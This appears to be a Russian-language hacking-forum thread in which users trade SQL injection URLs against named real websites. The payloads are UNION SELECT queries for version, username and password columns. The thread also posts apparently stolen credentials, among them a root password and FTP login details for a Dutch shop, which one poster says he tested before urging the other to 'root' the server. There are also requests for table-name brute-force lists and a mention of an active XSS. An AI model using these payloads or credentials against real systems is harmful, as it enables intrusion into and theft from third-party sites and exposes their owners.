http://www.arsenal-electro.ru/inc.php?include=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x17),0x17),3,4+from+users/*
не могу подобрать название колонки с паролями

Давно сюда не заглядывал, антибаян чекед =)
root:crystaldragon

Кроме version(),user, password дальше не могу ничего подобрать

код:

http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*

мона еще хеш админа вытащить...

http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,username,3,4,5,6+from+user/*
Вот это даст имя пользователя, это если ты не подобрал колонку.
Пароль ты нашел. Теперь лезь на фтп и рутай все это дело.
Я проверил работает!!!
ftp://www.kleijngeng.nl/ с такими данными пользователь - kleijnnl пароль - gifts4all
Зря сам не докопал. Все было просто. Я если не нахожу админку всегда пробую фтп.
удачи.
З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.

http://www.ipages.ru/index.php?id=9999+union+select+1,2,database()/*
помогите ето-нить, не могу таблицы подобрать
P.S. Сори за оффтоп киньте ссылку на базу названий таблиц для брутеры

2 Termin@L Тама есть АКТИВНАЯ ХСС в форуме, может поможет. А таблицы я тоже подобрать не смог.... пока не смог.

senate.michigan.gov

я знал имя юзера,а вот что на фтп можно залезть не догадался ),я ведь только учусь... И все это на смарте,так как компа нет спасибо за разъяснение! p.s напишите кто нить им,кто знает английский,что у них дыра,я не смогу т.к плохо знаю язык,скорее понимаю интуитивно p.p.s Red_Red1,я не собирался дефейсить,просто интересен процесс добывания паролей и т.д и т. п